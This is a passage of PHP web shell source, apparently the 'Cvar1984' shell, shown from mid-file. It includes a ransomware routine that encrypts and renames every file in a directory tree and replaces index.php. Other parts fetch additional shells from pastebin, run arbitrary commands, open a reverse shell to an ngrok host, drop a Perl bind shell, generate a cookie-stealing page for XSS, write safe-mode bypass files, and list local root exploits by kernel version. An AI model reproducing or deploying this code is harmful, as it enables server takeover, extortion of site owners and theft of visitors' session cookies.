e+pIszLvvSWaP0gBRWn32TR2TlH0nnGKusK6uI+nkLdTVOM0JaOMqSKuYRdWMmeDrft6bm6FcNotyjLvlsqqbSjLqW0irf4bpVWKfY3lshsPIbt2V3Q9iJnMiantFFN2d65Rm1uaJTEa0VDgooX3WeBQWOSYZMk9SK6oxq55TJvRVepultcVnOdia3GuFVwMug1mUJlhgEZjGFfOFJmtL8/PKK5kTjzCa/wqAXtIeEpfx6J83zrzaC7A6zszA01T32keMl0eOF8eNWEeNWPmU6aa3yXznUkdlXBKhTzrJSNRRrPQRVazmsX1uvid7ghjDofOMmqnQxLL+8FzuSVU0HNDRQF+DhYw9UyddNIkGgnagqjzdlGlsCEC+5Em6LNlBcGFFOQdIW2JdNX0wKL1ZxtvEkcJCXB+miheaIt/bPGFE7bjtJ+dn748OTs5396CSxYX/kjgGzhVXeat1Lu5s0gQeHm2l4nVsXzzBvy5vRXgGyncQ9ntF1lDDvdtOCBS75lrBSwlnYheshj+G46EpMF9FjZTL/ejBSP9JJDsdy0Wln0T3F9WwuGYEhuBieCCSUO4GwUIY6ktCQ3/nF6USmVZ4AA+Zksea7a3fBy0AuzbWomFUgGHwe50HDBkXTA4WLm750ymaRFMAC1+TMaUn5KUlk2L4qknAvMGhNzeZmtCr0CAmoO9OPHMXbQVZKKPKc6rXmDDJTLTD3bJnhnBtOoYUzsGF53BHFQ/tQF6oO8dEE2pEL1+9/7nMyQZBem+g4vw7S06e/X3s5O/vjopkk19Lr0LbHD7KQw/lr7H0ybYApcpvyd9qztUU876g3KlHfJkcNojXHIrHnPBP+7BAcayQ5kK9ykgHVaLJBuZLeWOEJybDiMGeVgBti6uWj18g/6NPPQfZLkeeoasmoe+R1bdQ98iq+GhP0Gaeug7ZO156F/I2vdQCVkHHtpB1qGHysiqeghSGe2CjEsoMZQVKFtQelA+R95z9NyCmofa8LWhPILSgfIYyo8foXKL7iyGb2jqe7V9CwoCIQ41QTreoSX/aoh69ZqV/SiDPLduqWutrHTk7x+K48DSv8JEid/33EYza14utFUVNKSKXquq+mWxIct4NMjGNWT9sthQ5ZDAfcxzDy3U4ZT0kazCWZFy4YH8XjIAk/csFFBAGoq8xh6YHHj1Jgzs0tHQq9dV7TKrjnKCzGqv3tCd00Ygv3Kj8+r7lhxyYCkY9uqHlmJqVK3Q9Vy3ZoU1KOpWWIeiYYUNKJpW2IRizwr3oNi3wn0oDqzwAIpDKzz03JocXoXShRLk1ECOC4Jq9TvrEwYUieRnID+x/CTyM5Sfz/LD4QOp5gsevaETiDpgqpoW5FWPhUKTooxEoowwzAgDKoimcElpTfEohS2hj8Pz9MJK22F2SG6lsDMgqQnyrA9pJ38mgnWVreNyt1KRVlZNDynVM+onTQXtM1qiadKAGfGzIrrtfqbwmJ33L/J0AgbPtzMIPZ7Wit1USpKVnsLMOR9QLImWZFHMCky6GOeTK5VijAelUoTxp1JpiHFSKnGMP8PQDqCf9cy3p3hvZtgCm4LtE/kD2ItRBzAQzAen6r6/kWhE5QKBFbAbvs/GApZKPF6kleVqDLmC1Zc0JKNIwP3ago3CEj2W2nPb1Dm5wDc+kGQCenS6zVhqODhJ7gB3cr2D4JUk/chSQeH2enyfVNbcFgVdJkAiEYL4PcVyPNcqoyRGlZwbWM8LhAsM+jiVJ4zC5pntBPf3lQ5eOqmWztjtreW9sF6dqciO3oIsH2rZDtiBau6VFuxLdDaTuZaeCWztJrhKGz3vpaVUdRaQPvL1xGENYHXu7qzcRunaMjqF7Kj8jKypF8wbWGkbMEytsz33R7Xj8RhClITJSP5aiu7k+d1xLi6O5BV+8YjTduSvHFBrO+rPev8L")))) {
715. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> index.php (Default Page)<br>';
716. }
717. }
718. }
719. public function shcpackUnstall() {
720. if(file_exists(".htabak")) {
721. if(unlink(".htaccess") && unlink("index.php")) {
722. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
723. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> index.php (Default Page)<br>';
724. }
725. rename(".htabak", ".htaccess");
726. }
727. }
728. public function plus() {
729. flush();
730. ob_flush();
731. }
732. public function locate() {
733. return getcwd();
734. }
735. public function shcdirs($dir, $method, $key) {
736. switch($method) {
737. case '1':
738. deRanSomeware::shcpackInstall();
739. break;
740. case '2':
741. deRanSomeware::shcpackUnstall();
742. break;
743. }
744. foreach(scandir($dir) as $d) {
745. if($d != '.' && $d != '..') {
746. $locate = $dir . DIRECTORY_SEPARATOR . $d;
747. if(!is_dir($locate)) {
748. if(deRanSomeware::kecuali($locate, "ini.php") && deRanSomeware::kecuali($locate, ".png") && deRanSomeware::kecuali($locate, ".htaccess") && deRanSomeware::kecuali($locate, "ini.php") && deRanSomeware::kecuali($locate, "index.php") && deRanSomeware::kecuali($locate, ".htabak")) {
749. switch($method) {
750. case '1':
751. deRanSomeware::shcEnCry($key, $locate);
752. deRanSomeware::shcEnDesDirS($locate, "1");
753. break;
754. case '2':
755. deRanSomeware::shcDeCry($key, $locate);
756. deRanSomeware::shcEnDesDirS($locate, "2");
757. break;
758. }
759. }
760. } else {
761. deRanSomeware::shcdirs($locate, $method, $key);
762. }
763. }
764. deRanSomeware::plus();
765. }
766. }
767. public function shcEnDesDirS($locate, $method) {
768. switch($method) {
769. case '1':
770. rename($locate, $locate . ".bak");
771. break;
772. case '2':
773. $locates = str_replace(".bak", "", $locate);
774. rename($locate, $locates);
775. break;
776. }
777. }
778. public function shcEnCry($key, $locate) {
779. $data = file_get_contents($locate);
780. $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM);
781. $encrypted = base64_encode($iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv));
782. if(file_put_contents($locate, $encrypted)) {
783. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
784. } else {
785. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> ' . $locate . ' <br>';
786. }
787. }
788. public function shcDeCry($key, $locate) {
789. $data = base64_decode(file_get_contents($locate));
790. $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
791. $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "\0");
792. if(file_put_contents($locate, $decrypted)) {
793. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
794. } else {
795. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
796. }
797. }
798. public function kecuali($ext, $name) {
799. $re = "/({$name})/";
800. preg_match($re, $ext, $matches);
801. if($matches[1]) {
802. return false;
803. }
804. return true;
805. }
806. }
807. if($_POST['submit']) {
808. switch($_POST['method']) {
809. case '1':
810. deRanSomeware::shcdirs(deRanSomeware::locate(), "1", $_POST['key']);
811. break;
812. case '2':
813. deRanSomeware::shcdirs(deRanSomeware::locate(), "2", $_POST['key']);
814. break;
815. }
816. } else {
817. echo "
818. <form action='' method='post' style='text-align: center;'>
819. <label>Key : </label>
820. <input type='text' name='key' class='inpute' placeholder='KEY ENC/DEC'>
821. <select name='method' class='selecte'>
822. <option value='1'>Infection</option>
823. <option value='2'>DeInfection</option>
824. </select>
825. <input type='submit' name='submit' class='submite' value='Submit'/>
826. </form>";
827. }
828. echo "
829. </div>
830. </body>";
831. }
832. function idxshell() {
833. if(!file_exists('.config')) {
834. mkdir('.config', 0755);
835. }
836. $nama = fopen(".config/idx.php", "w");
837. $file = file_get_contents('https://pastebin.com/raw/5UQAgFsp');
838. fwrite($nama, $file);
839. chmod($nama, 0444);
840. fclose($nama);
841. }
842. function adminer() {
843. if(!file_exists('.config')) {
844. mkdir('.config', 0755);
845. }
846. $nama = fopen(".config/adminer.php", "w+");
847. $file = file_get_contents('https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php');
848. fwrite($nama, $file);
849. fclose($nama);
850. }
851. function jembud2() {
852. if(!file_exists('.config')) {
853. mkdir('.config', 0755);
854. }
855. $nama = fopen(".config/jembud2.php", "w+");
856. $file = file_get_contents('https://pastebin.com/raw/nCqVmtBu');
857. fwrite($nama, $file);
858. chmod($nama, 0444);
859. fclose($nama);
860. }
861. function ngindex() {
862. $nama = fopen("Cvar1984.php", "w+");
863. $file = file_get_contents('https://pastebin.com/raw/LVGSGa1m');
864. fwrite($nama, $file);
865. chmod($nama, 0444);
866. fclose($nama);
867. }
868. function filemanager_bg() {
869. global $sep, $self;
870. $path = !empty($_GET['path']) ? $_GET['path'] : getcwd();
871. $dirs = array();
872. $fils = array();
873. if(is_dir($path)) {
874. chdir($path);
875. if($handle = opendir($path)) {
876. while(($item = readdir($handle)) !== FALSE) {
877. if($item == ".") {
878. continue;
879. }
880. if($item == "..") {
881. continue;
882. }
883. if(is_dir($item)) {
884. array_push($dirs, $path . $sep . $item);
885. } else {
886. array_push($fils, $path . $sep . $item);
887. }
888. }
889. } else {
890. alert("Access Denied for this operation");
891. }
892. } else {
893. alert("Directory Not Found!!!");
894. }
895. echo "
896. <div id=result>
897. <table class=table>
898. <tr>
899. <th width='500px'>Name</th>
900. <th width='100px'>Size</th>
901. <th width='100px'>Permissions</th>
902. <th width='500px'>Actions</th>
903. </tr>";
904. foreach($dirs as $dir) {
905. echo "<tr><td><a href='{$self}?path={$dir}'>" . basename($dir) . "</a></td>
906. <td>" . filesize_x($dir) . "</td>
907. <td><a href='{$self}?path={$path}&amp;perm={$dir}'>" . file_perm($dir) . "</a></td>
908. <td><a href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> |
909. <a href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a>
910. | <a href='{$self}?zip={$dir}'> Download </a></td></tr>";
911. }
912. foreach($fils as $fil) {
913. echo "<tr><td><a href='{$self}?path={$path}&amp;read={$fil}'>" . basename($fil) . "</a></td>
914. <td>" . filesize_x($fil) . "</td>
915. <td><a href='{$self}?path={$path}&amp;perm={$fil}'>" . file_perm($fil) . "</a></td>
916. <td><a href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> |
917. <a href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a>
918. | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a>
919. |
920. <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a> |
921. <a href='{$self}?zip={$fil}'> Download </a>
922. </td>";
923. }
924. echo "</tr></table></div>";
925. }
926. function rename_bg() {
927. if(isset($_GET['old_name']) && isset($_GET['new_name'])) {
928. $o_r_path = basename($_GET['old_name']);
929. $r_path = str_replace($o_r_path, "", $_GET['old_name']);
930. $r_new_name = $r_path . $_GET['new_name'];
931. echo $r_new_name;
932. if(rename($_GET['old_name'], $r_new_name) == FALSE) {
933. alert("Access Denied for this action!!!");
934. } else {
935. alert("Renamed File Succeessfully");
936. }
937. }
938. }
939. function edit_file() {
940. $path = $_GET['path'];
941. chdir($path);
942. $edt_file = $_GET['edit'];
943. $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
944. if($e_content) {
945. $o_content = $e_content;
946. } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) {
947. $fd = fopen($edt_file, "rb");
948. if(!$fd) {
949. alert("Permission Denied");
950. } else {
951. while(!feof($fd)) {
952. $o_content = wordwrap(htmlspecialchars(fgets($fd)));
953. }
954. }
955. fclose($fd);
956. }
957. echo "<div id='result'>
958. <center><h2>Edit File</h2><hr></center><br>
959. <font color=red>View File</font> : <font color=yellow><a style='text-decoration:none; color:yellow;' href='?read=" . $_GET['edit'] . "'>" . basename($_GET['edit']) . "</a><br /><br /><hr><br></font>
960. <form method='POST'><input type='hidden' name='e_file' value=" . $_GET['edit'] . ">
961. <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>" . $o_content . "</textarea></center>
962. <hr>
963. <input class='input_big' name='save' type='submit' value='O' ><br><br><hr><br><br></div>";
964. }
965. function edit_file_bg() {
966. if(file_exists($_POST['e_file'])) {
967. $handle = fopen($_POST['e_file'], "w+");
968. if(!handle) {
969. alert("Permission Denied");
970. } else {
971. fwrite($handle, $_POST['e_content_n']);
972. alert("Your changes were Successfully Saved!");
973. }
974. fclose($handle);
975. } else {
976. alert("File Not Found!!!");
977. }
978. }
979. function delete_file() {
980. $del_file = $_GET['del_fil'];
981. if(unlink($del_file) != FALSE) {
982. alert("Deleted Successfully");
983. exit;
984. } else {
985. alert("Access Denied for this Operation");
986. exit;
987. }
988. }
989. function deldirs($d_dir) {
990. $d_files = glob($d_dir . '*', GLOB_MARK);
991. foreach($d_files as $d_file) {
992. if(is_dir($d_file)) {
993. deldirs($d_file);
994. } else {
995. unlink($d_file);
996. }
997. }
998. if(is_dir($d_dir)) {
999. if(rmdir($d_dir)) {
1000. alert("Deleted Directory Successfully");
1001. } else {
1002. alert("Access Denied for this Operation");
1003. }
1004. }
1005. }
1006. function code_viewer() {
1007. $path = $_GET['path'];
1008. $r_file = $_GET['read'];
1009. $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
1010. if($r_content) {
1011. $rr_content = $r_content;
1012. } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) {
1013. $fd = fopen($r_file, "rb");
1014. if(!$fd) {
1015. alert("Permission Denied");
1016. } else {
1017. while(!feof($fd)) {
1018. $rr_content = wordwrap(htmlspecialchars(fgets($fd)));
1019. }
1020. }
1021. fclose($fd);
1022. }
1023. echo "<div id=result><center><h2>View File</h2></center><hr><br>
1024. <font color=red>Edit File</font><font color=yellow> : </font>
1025. <font color=#999><a style='text-decoration:none; color:yellow;' href='?path={$path}&amp;edit=" . $_GET['read'] . "'>" . basename($_GET['read']) . "</a></font><br><br><hr><pre><code>" . $rr_content . "</code></pre>
1026. <br><br><hr><br><br></div>";
1027. }
1028. function copy_file_ui() {
1029. echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=" . $_GET['copy'] . " > To : <input size=40
1030. name='c_target' value=" . $_GET['path'] . $sep . "> Name :
1031. <input name='cn_name'><input type='submit' value=' O'></form></table><br><br><hr><br><br><br></center></div>";
1032. }
1033. function copy_file_bg() {
1034. global $sep;
1035. if(function_exists(copy)) {
1036. if(copy($_GET['c_file'], $_GET['c_target'] . $sep . $_GET['cn_name'])) {
1037. alert("Succeded");
1038. } else {
1039. alert("Access Denied");
1040. }
1041. }
1042. }
1043. function ch_perm_bg() {
1044. if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) {
1045. if(chmod($_GET['p_filex'], $_GET['new_perm']) != FALSE) {
1046. alert("Succeded. Permission Changed!!!");
1047. } else {
1048. alert("Access Denied for This Operation");
1049. }
1050. }
1051. }
1052. function ch_perm_ui() {
1053. $p_file = $_GET['perm'];
1054. echo "<div id =result>
1055. <center><h2>New Permission</h2><hr /><p>
1056. <form method
1057. '>
1058. <input type='hidden' name='path' value=" . getcwd() . " ><input name='p_filex' type=hidden
1059. value={$p_file} >New Permission : <input name='new_perm' isze='40'
1060. value=0" . substr(sprintf('%o', fileperms($p_file)), -3) . "><input type='submit' value=' O'
1061. /></form></p><p>Full Access : <font
1062. color=red>755</font><br />Notice : <font
1063. color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655,
1064. etc</p><br /><br /><hr /><br /><br
1065. /></center></div>";
1066. ch_perm_bg();
1067. }
1068. function mk_file_ui() {
1069. chdir($_GET['path']);
1070. echo "<div id=result><br><br><font color=red><form method='GET'>
1071. <input type='hidden' name='path' value=" . getcwd() . ">
1072. New File Name : <input size='40' name='new_f_name'
1073. value=" . $_GET['new_file'] . "></font><br><br><hr><br><center>
1074. <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr>
1075. <input class='input_big' type='submit' value='O'></form></center></div>";
1076. }
1077. function mk_file_bg() {
1078. chdir($_GET['path']);
1079. $c_path = $_GET['path'];
1080. $c_file = $_GET['new_f_name'];
1081. $c_file_contents = $_GET['n_file_content'];
1082. $handle = fopen($c_file, "w");
1083. if(!$handle) {
1084. alert("Permission Denied");
1085. } else {
1086. fwrite($handle, $c_file_contents);
1087. alert("Your changes were Successfully Saved!");
1088. }
1089. fclose($handle);
1090. }
1091. function create_dir() {
1092. chdir($_GET['path']);
1093. $new_dir = $_GET['new_dir'];
1094. if(is_writable($_GET['path'])) {
1095. mkdir($new_dir);
1096. alert("Direcory Created Successfully");
1097. exit;
1098. } else {
1099. alert("Access Denied for this Operation");
1100. exit;
1101. }
1102. }
1103. function cmd($cmd) {
1104. chdir($_GET['path']);
1105. $res = "";
1106. if($_GET['cmdexe']) {
1107. $cmd = $_GET['cmdexe'];
1108. }
1109. if(function_exists('shell_exec')) {
1110. $res = shell_exec($cmd);
1111. } else if(function_exists('exec')) {
1112. exec($cmd, $res);
1113. $res = join("\n", $res);
1114. } else if(function_exists('system')) {
1115. ob_start();
1116. system($cmd);
1117. $res = ob_get_contents();
1118. ob_end_clean();
1119. } elseif(function_exists('passthru')) {
1120. ob_start();
1121. passthru($cmd);
1122. $res = ob_get_contents();
1123. ob_end_clean();
1124. } else if(function_exists('proc_open')) {
1125. $descriptorspec = array(
1126. 0 => array(
1127. "pipe",
1128. "r"
1129. ),
1130. 1 => array(
1131. "pipe",
1132. "w"
1133. ),
1134. 2 => array(
1135. "pipe",
1136. "w"
1137. )
1138. );
1139. $handle = proc_open($cmd, $descriptorspec, $pipes);
1140. if(is_resource($handle)) {
1141. if(function_exists('fread') && function_exists('feof')) {
1142. while(!feof($pipes[1])) {
1143. $res .= fread($pipes[1], 512);
1144. }
1145. } else if(function_exists('fgets') && function_exists('feof')) {
1146. while(!feof($pipes[1])) {
1147. $res .= fgets($pipes[1], 512);
1148. }
1149. }
1150. }
1151. pclose($handle);
1152. } else if(function_exists('popen')) {
1153. $handle = popen($cmd, "r");
1154. if(is_resource($handle)) {
1155. if(function_exists('fread') && function_exists('feof')) {
1156. while(!feof($handle)) {
1157. $res .= fread($handle, 512);
1158. }
1159. } else if(function_exists('fgets') && function_exists('feof')) {
1160. while(!feof($handle)) {
1161. $res .= fgets($handle, 512);
1162. }
1163. }
1164. }
1165. pclose($handle);
1166. }
1167. $res = wordwrap(htmlspecialchars($res));
1168. if($_GET['cmdexe']) {
1169. echo "<div id=result><center><font
1170. color=yellow><h2>root@Cvar1984:~#</h2></center><hr><pre>" . $res . "</font></pre></div>";
1171. }
1172. return $res;
1173. }
1174. function upload_file() {
1175. chdir($_POST['path']);
1176. if(move_uploaded_file($_FILES['upload_f']['tmp_name'], $_FILES['upload_f']['name'])) {
1177. alert("Uploaded File Successfully");
1178. } else {
1179. alert("Access Denied!!!");
1180. }
1181. }
1182. function reverse_conn_ui() {
1183. global $your_ip;
1184. echo "<div id='result'>
1185. <center><h2>Reverse Shell</h2><hr>
1186. <br><br><form method='GET'>
1187. <table class=tbl>
1188. <tr>
1189. <td>Your IP : <input name='my_ip' value='0.tcp.ngrok.io'>
1190. <br>
1191. PORT : <input name='my_port' value='40141'>
1192. <input type='submit' value='O'></td></tr>
1193. <select name='rev_option' style='color:yellow;background-color:black;border:1px solid #666;'>
1194. <option>PHP Reverse Shell</option>
1195. <option>PERL Bind Shell</option>
1196. </select></form>
1197. <tr><td>
1198. <font color=red>PHP Reverse Shell</font> : <font color=yellow> nc -lvp
1199. <i>port</i></font></td></tr><tr><td><font
1200. color=red>PERL Bind Shell</font> : <font color=yellow> nc
1201. <i>server_ip port</i></font></td></tr></table></div>";
1202. }
1203. function reverse_conn_bg() {
1204. global $os;
1205. $option = $_REQUEST['rev_option'];
1206. $ip = $_GET['my_ip'];
1207. $port = $_GET['my_port'];
1208. if($option == "PHP Reverse Shell") {
1209. echo "<div id=result><h2>RESULT<h2><hr><br>";
1210. function printit($string) {
1211. if(!$daemon) {
1212. print "$string\n";
1213. }
1214. }
1215. $chunk_size = 1400;
1216. $write_a = null;
1217. $error_a = null;
1218. $shell = 'uname -a; w; id; /bin/sh -i';
1219. $daemon = 0;
1220. $debug = 0;
1221. if(function_exists('pcntl_fork')) {
1222. $pid = pcntl_fork();
1223. if($pid == -1) {
1224. printit("ERROR: Can't fork");
1225. exit(1);
1226. }
1227. if($pid) {
1228. exit(0);
1229. }
1230. if(posix_setsid() == -1) {
1231. printit("Error: Can't setsid()");
1232. exit(1);
1233. }
1234. $daemon = 1;
1235. } else {
1236. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
1237. }
1238. chdir("/");
1239. umask(0);
1240. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1241. if(!$sock) {
1242. printit("$errstr ($errno)");
1243. exit(1);
1244. }
1245. $descriptorspec = array(
1246. 0 => array(
1247. "pipe",
1248. "r"
1249. ),
1250. 1 => array(
1251. "pipe",
1252. "w"
1253. ),
1254. 2 => array(
1255. "pipe",
1256. "w"
1257. )
1258. );
1259. $process = proc_open($shell, $descriptorspec, $pipes);
1260. if(!is_resource($process)) {
1261. printit("ERROR: Can't spawn shell");
1262. exit(1);
1263. }
1264. stream_set_blocking($pipes[0], 0);
1265. stream_set_blocking($pipes[1], 0);
1266. stream_set_blocking($pipes[2], 0);
1267. stream_set_blocking($sock, 0);
1268. printit("<font color=yellow>Successfully opened reverse shell to $ip:$port </font>");
1269. while(1) {
1270. if(feof($sock)) {
1271. printit("ERROR: Shell connection terminated");
1272. break;
1273. }
1274. if(feof($pipes[1])) {
1275. printit("ERROR: Shell process terminated");
1276. break;
1277. }
1278. $read_a = array(
1279. $sock,
1280. $pipes[1],
1281. $pipes[2]
1282. );
1283. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
1284. if(in_array($sock, $read_a)) {
1285. if($debug)
1286. printit("SOCK READ");
1287. $input = fread($sock, $chunk_size);
1288. if($debug)
1289. printit("SOCK: $input");
1290. fwrite($pipes[0], $input);
1291. }
1292. if(in_array($pipes[1], $read_a)) {
1293. if($debug)
1294. printit("STDOUT READ");
1295. $input = fread($pipes[1], $chunk_size);
1296. if($debug)
1297. printit("STDOUT: $input");
1298. fwrite($sock, $input);
1299. }
1300. if(in_array($pipes[2], $read_a)) {
1301. if($debug)
1302. printit("STDERR READ");
1303. $input = fread($pipes[2], $chunk_size);
1304. if($debug)
1305. printit("STDERR: $input");
1306. fwrite($sock, $input);
1307. }
1308. }
1309. fclose($sock);
1310. fclose($pipes[0]);
1311. fclose($pipes[1]);
1312. fclose($pipes[2]);
1313. proc_close($process);
1314. echo "<br><br><hr><br><br></div>";
1315. } else if($option == "PERL Bind Shell") {
1316. global $bind_perl, $os;
1317. $pbfl = $bind_perl;
1318. $handlr = fopen("back.pl", "wb");
1319. if($handlr) {
1320. fwrite($handlr, gzinflate(base64_decode($bind_perl)));
1321. } else {
1322. alert("Access Denied for create new file");
1323. }
1324. fclose($handlr);
1325. if(file_exists("back.pl")) {
1326. if($os == "nix") {
1327. cmd("chmod +x back.pl;perl back.pl $port");
1328. } else {
1329. cmd("perl back.pl $port");
1330. }
1331. }
1332. }
1333. }
1334. function cookie_jack() {
1335. global $cookie_highjacker;
1336. echo "<div id=result><center><h2>NOTICE</h2><hr/>";
1337. if(function_exists('fopen') && function_exists('fwrite')) {
1338. $cook = gzinflate(base64_decode($cookie_highjacker));
1339. $han_le = fopen("404.php", "w+");
1340. if($han_le) {
1341. fwrite($han_le, $cook);
1342. echo "Yes... Cookie highjacker is generated<br> Name : <a style='color:yellow;' target=_blank
1343. href=404.php>404.php</a></font>.<br
1344. />It is usefull in XSS<br />It will make a file
1345. <font color=red>configuration.txt</font> in this direcory and
1346. save the cookie value in it. :p cheers...<br /><br /><hr
1347. /><br /><br /></center></div>";
1348. } else {
1349. echo "<font color=red>Sorry... Generate COOKIE
1350. HIGHJACKER failed<br /><br /><hr /><br /><br
1351. /></center></div>";
1352. }
1353. }
1354. }
1355. function safe_mode_fuck() {
1356. global $s_php_ini, $s_htaccess, $s_htaccess_pl, $ini_php;
1357. $path = chdir($_GET['path']);
1358. chdir($_GET['path']);
1359. switch($_GET['safe_mode']) {
1360. case "s_php_ini":
1361. $s_file = $s_php_ini;
1362. $s_name = "php.ini";
1363. break;
1364. case "s_htaccess":
1365. $s_name = ".htaccess";
1366. $s_file = $s_htaccess;
1367. break;
1368. case "s_htaccess_pl":
1369. $s_name = ".htaccess";
1370. $s_file = $s_htaccess_pl;
1371. break;
1372. case "s_ini_php":
1373. $s_name = "ini.php";
1374. $s_file = $ini_php;
1375. break;
1376. }
1377. if(function_exists('fopen') && function_exists('fwrite')) {
1378. $s_handle = fopen("$s_name", "w+");
1379. if($s_handle) {
1380. fwrite($s_handle, $s_file);
1381. alert("Operation Succeed!!!");
1382. } else {
1383. alert("Access Denied!!!");
1384. }
1385. fclose($s_handle);
1386. }
1387. }
1388. function ceklog() {
1389. echo "
1390. <style>
1391. hr{color:silver;}
1392. </style>
1393. <pre>";
1394. error_reporting(0);
1395. class jalanin {
1396. public function cuk($patch) {
1397. foreach(scandir($patch) as $d) {
1398. if($d!='.' && $d!='..') {
1399. $d = $patch.DIRECTORY_SEPARATOR.$d;
1400. if(!is_dir($d)) {
1401. jalanin::cek($d);
1402. } else {
1403. jalanin::cuk($d);
1404. }
1405. }
1406. }
1407. }
1408. public function cek($patch){
1409. $exif="/exif_read_data/";
1410. preg_match($exif,file_get_contents(addslashes($patch)), $match);
1411. if($match[0]) {
1412. echo "<font color='yellow'>[EXECUTION FILE] ".$patch."</font><br><hr>";
1413. } else if(exif_read_data($patch)) {
1414. echo "<font color='red'>[LOGGER DETECTED] ".$patch."</font><br><hr>";
1415. } else {
1416. echo "<font color='lime'>[FILE SAFE] ".$patch."</font><br><hr>";
1417. }
1418. }
1419. }
1420. jalanin::cuk(getcwd());
1421. }
1422. function safe_mode_fuck_ui() {
1423. global $path;
1424. $path = getcwd();
1425. echo "<div id=result><br>
1426. <center><h2>Select Your Options</h2>
1427. <hr>
1428. <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>php.ini</a></td>
1429. <td><a href=?path={$path}&amp;safe_mode=s_htaccess>.htaccess</a></td>
1430. <td><a href=?path={$path}&amp;safe_mode=s_htaccess_pl>.htacces (perl)</td>
1431. <td><a href=?path={$path}&amp;safe_mode=s_ini_php>ini.php</td></tr></table><br><br></div>";
1432. }
1433. function AccessDenied() {
1434. global $path, $forbid_dir;
1435. $path = $_GET['path'];
1436. chdir($path);
1437. if(function_exists('fopen') && function_exists('fwrite')) {
1438. $forbid = fopen(".htaccess", "wb");
1439. if($forbid) {
1440. fwrite($forbid, $forbid_dir);
1441. alert("Opreation Succeeded");
1442. } else {
1443. alert("Access Denied");
1444. }
1445. fclose($forbid);
1446. }
1447. }
1448. function r00t_exploit() {
1449. $kernel = php_uname();
1450. $r00t_db = array(
1451. '2.6.19' => 'jessica',
1452. '2.6.20' => 'jessica',
1453. '2.6.21' => 'jessica',
1454. '2.6.22' => 'jessica',
1455. '2.6.23' => 'jessica,vmsplice',
1456. '2.6.24' => 'jessica,vmspice',
1457. '2.6.31' => 'enlightment',
1458. '2.6.18' => 'brk,ptrace,kmod,brk2',
1459. '2.6.17' => 'prctl3,raptor_prctl,py2',
1460. '2.6.16' => 'raptor_prctl,exp.sh,raptor,raptor2,h00lyshit',
1461. '2.6.15' => 'py2,exp.sh,raptor,raptor2,h00lyshit',
1462. '2.6.14' => 'raptor,raptor2,h00lyshit',
1463. '2.6.13' => 'kdump,local26,py2,raptor_prctl,exp.sh,prctl3,h00lyshit',
1464. '2.6.12' => 'h00lyshit',
1465. '2.6.11' => 'krad3, krad,h00lyshit',
1466. '2.6.10' => 'h00lyshit,stackgrow2,uselib24,exp.sh,krad,krad2',
1467. '2.6.9' => 'exp.sh,krad3,py2, prctl3,h00lyshit',
1468. '2.6.8' => 'h00lyshit, krad, krad2',
1469. '2.6.7' => 'h00lyshit,krad,krad2',
1470. '2.6.6' => 'h00lyshit,krad,krad2',
1471. '2.6.2' => 'h00lyshit,krad,mremap_pte',
1472. '2.6.' => 'prctl,kmdx,newsmp,pwned,ptrace_kmod,ong_bak',
1473. '2.4.29' => 'elflbl,expand_stack,stackgrow2,uselib24,smpracer',
1474. '2.4.27' => 'elfdump,uselib24',
1475. '2.4.25' => 'uselib24',
1476. '2.4.24' => 'mremap_pte,loko,uselib24',
1477. '2.4.23' => 'mremap_pte,loko,uselib24',
1478. '2.4.22' => 'loginx,brk,km2,loko,ptrace,uselib24,brk2,ptrace-kmod',
1479. '2.4.21' => 'w00t,brk,uselib24,loginx,brk2,ptrace-kmod',
1480. '2.4.20' => 'mremap_pte, w00t,brk,ave,uselib24,loginx,ptrace-kmod,ptrace,kmod',
1481. '2.4.19' => 'newlocal,w00t,ave,uselib24,loginx,kmod',
1482. '2.4.18' => 'km2, w00t,uselib24,loginx,kmod',
1483. '2.4.17' => 'newlocal,w00t,uselib24,loginx,kmod',
1484. '2.4.16' => 'w00t,uselib24,loginx',
